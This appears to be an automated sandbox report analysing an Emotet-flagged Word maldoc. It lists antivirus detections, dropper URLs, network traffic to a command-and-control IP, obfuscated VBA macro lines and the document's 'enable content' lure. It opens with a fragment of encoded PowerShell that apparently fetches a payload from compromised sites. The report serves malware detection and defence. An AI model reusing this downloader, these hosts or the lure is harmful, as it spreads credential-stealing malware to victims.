wBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://veterinariadrpopui.comAvira URL Cloud: Label: malware
                      Source: http://veterinariadrpopui.com/content/5f18Q/Avira URL Cloud: Label: malware
                      Source: http://sofsuite.com/wp-includes/2jm3nIk/Avira URL Cloud: Label: phishing
                      Source: http://khanhhoahomnay.net/wordpress/CGMC/Avira URL Cloud: Label: malware
                      Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/Avira URL Cloud: Label: malware
                      Source: http://shop.elemenslide.com/wp-content/n/Avira URL Cloud: Label: malware
                      Source: http://wpsapk.com/wp-admin/v/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: veterinariadrpopui.comVirustotal: Detection: 7%Perma Link
                      Source: khanhhoahomnay.netVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MAIL-0573188.docVirustotal: Detection: 66%Perma Link
                      Source: MAIL-0573188.docMetadefender: Detection: 47%Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F75AE CryptDecodeObjectEx,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F109C FindFirstFileW,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: wpsapk.com
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.130.229.91:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.141.14:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: http://wpsapk.com/wp-admin/v/
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: http://veterinariadrpopui.com/content/5f18Q/
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: http://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                      Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 209.59.139.39 209.59.139.39
                      Source: Joe Sandbox ViewIP Address: 45.130.229.91 45.130.229.91
                      Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
                      Source: global trafficHTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1DNT: 0Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWzUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 8068Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020023A InternetReadFile,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: wpsapk.com
                      Source: unknownHTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1DNT: 0Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWzUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 8068Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmpString found in binary or memory: http://beatlemail.net/picture.php?blogid=0
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
                      Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
                      Source: powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
                      Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com
                      Source: powershell.exe, 00000005.00000002.2109649059.000000001B86F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com/wp-admin/v/
                      Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaneH)
                      Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmpString found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: https://shop.elemenslide.com
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: https://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmpString found in binary or memory: https://shop.elemenslide.comp
                      Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: MAIL-0573188.docOLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                      Source: MAIL-0573188.docOLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
